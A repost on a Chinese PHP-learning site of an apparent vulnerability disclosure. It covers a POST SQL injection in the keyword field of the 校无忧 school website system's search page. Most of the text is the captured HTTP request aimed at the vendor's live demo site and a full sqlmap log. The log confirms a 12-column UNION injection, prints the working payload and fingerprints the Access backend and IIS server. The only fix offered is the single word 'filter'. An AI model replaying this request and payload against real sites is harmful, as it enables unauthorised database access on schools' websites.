网站地图    收藏   

子栏目

主页 > 入门引导 > 黑客攻防 >

校无忧某系统POST注入 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] 校无忧学校网站系统 v2 2 最新版 PS:我百度了 只有2 1 和1 x的有漏洞 2 2的没有官网啊:http: www xiao5u com 官方演示站:http: www xiao5u com Demo School search asp在搜索框有SQL注入 变量:keyw...

校无忧学校网站系统 v2.2 最新版 PS:我百度了 只有2.1 和1.x的有漏洞 2.2的没有




官网啊:http://www.xiao5u.com/



官方演示站:http://www.xiao5u.com/Demo/School/search.asp



在搜索框有SQL注入 变量:keyword=


 

POST /Demo/School/search.asp HTTP/1.1
Host: www.xiao5u.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.xiao5u.com/Demo/School/search.asp
Cookie: CNZZDATA585346=cnzz_eid%3D1533443457-1403577305-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1404356337; Hm_lvt_27349b2ace33b7a6f44e3f892d03b3b0=1403577070; ASPSESSIONIDSQRCBBAS=CIHFGMCCJGEONLLAEDADCFFG
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

keyword=abc&image.x=11&image.y=9








 

[root@Hacker~]# Sqlmap -r 1.txt

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 10:56:09

[10:56:09] [INFO] parsing HTTP request from '1.txt'
[10:56:10] [INFO] testing connection to the target URL
[10:56:10] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[10:56:11] [INFO] target URL is stable
[10:56:11] [INFO] testing if POST parameter 'keyword' is dynamic
[10:56:12] [WARNING] POST parameter 'keyword' does not appear dynamic
[10:56:12] [INFO] heuristics detected web page charset 'GB2312'
[10:56:12] [INFO] heuristic (basic) test shows that POST parameter 'keyword' mig
ht be injectable (possible DBMS: 'Microsoft Access')
[10:56:12] [INFO] testing for SQL injection on POST parameter 'keyword'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft Acces
s'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'Microsoft Access' extending provided level
 (1) and risk (1)? [Y/n] y
[10:56:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:56:15] [WARNING] reflective value(s) found and filtering out
[10:56:18] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl
ace (original value)'
[10:56:19] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and O
RDER BY clauses'
[10:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:56:27] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[10:56:28] [INFO] target URL appears to have 12 columns in query
[10:56:29] [INFO] POST parameter 'keyword' is 'Generic UNION query (NULL) - 1 to
 10 columns' injectable
POST parameter 'keyword' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] y
[10:56:31] [INFO] testing if POST parameter 'image.x' is dynamic
[10:56:31] [WARNING] POST parameter 'image.x' does not appear dynamic
[10:56:31] [WARNING] heuristic (basic) test shows that POST parameter 'image.x'
might not be injectable
[10:56:31] [INFO] testing for SQL injection on POST parameter 'image.x'
[10:56:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:56:35] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl
ace (original value)'
[10:56:36] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and O
RDER BY clauses'
[10:56:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:56:36] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[10:56:36] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n] y
[10:56:52] [WARNING] if UNION based SQL injection is not detected, please consid
er forcing the back-end DBMS (e.g. --dbms=mysql)
[10:57:20] [WARNING] POST parameter 'image.x' is not injectable
[10:57:20] [INFO] testing if POST parameter 'image.y' is dynamic
[10:57:20] [WARNING] POST parameter 'image.y' does not appear dynamic
[10:57:20] [WARNING] heuristic (basic) test shows that POST parameter 'image.y'
might not be injectable
[10:57:20] [INFO] testing for SQL injection on POST parameter 'image.y'
[10:57:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:57:24] [INFO] testing 'Microsoft Access boolean-based blind - Parameter repl
ace (original value)'
[10:57:24] [INFO] testing 'Microsoft Access boolean-based blind - GROUP BY and O
RDER BY clauses'
[10:57:25] [INFO] testing 'Generic UNION query (82) - 1 to 10 columns'
[10:57:56] [WARNING] POST parameter 'image.y' is not injectable
sqlmap identified the following injection points with a total of 374 HTTP(s) req
uests:
---
Place: POST
Parameter: keyword
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: keyword=abc' UNION ALL SELECT NULL,CHR(113)&CHR(106)&CHR(115)&CHR(9
7)&CHR(113)&CHR(69)&CHR(109)&CHR(113)&CHR(110)&CHR(108)&CHR(69)&CHR(84)&CHR(116)
&CHR(103)&CHR(76)&CHR(113)&CHR(122)&CHR(99)&CHR(108)&CHR(113),NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&image.x=11&image.y=9
---
[10:57:56] [INFO] testing MySQL
[10:57:56] [WARNING] the back-end DBMS is not MySQL
[10:57:56] [INFO] testing Oracle
[10:57:56] [WARNING] the back-end DBMS is not Oracle
[10:57:56] [INFO] testing PostgreSQL
[10:57:56] [WARNING] the back-end DBMS is not PostgreSQL
[10:57:56] [INFO] testing Microsoft SQL Server
[10:57:57] [WARNING] the back-end DBMS is not Microsoft SQL Server
[10:57:57] [INFO] testing SQLite
[10:57:57] [WARNING] the back-end DBMS is not SQLite
[10:57:57] [INFO] testing Microsoft Access
[10:57:57] [INFO] confirming Microsoft Access
[10:57:57] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
[10:57:57] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[10:57:57] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[10:57:57] [INFO] fetched data logged to text files under 'E:\SQL?~1\SQLMAP~1.4\
Bin\output\www.xiao5u.com'

[*] shutting down at 10:57:57

[root@Hacker~]# Sqlmap -r 1.txt




 

demo站.png

 

demo站.png

 

修复方案:

过滤

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论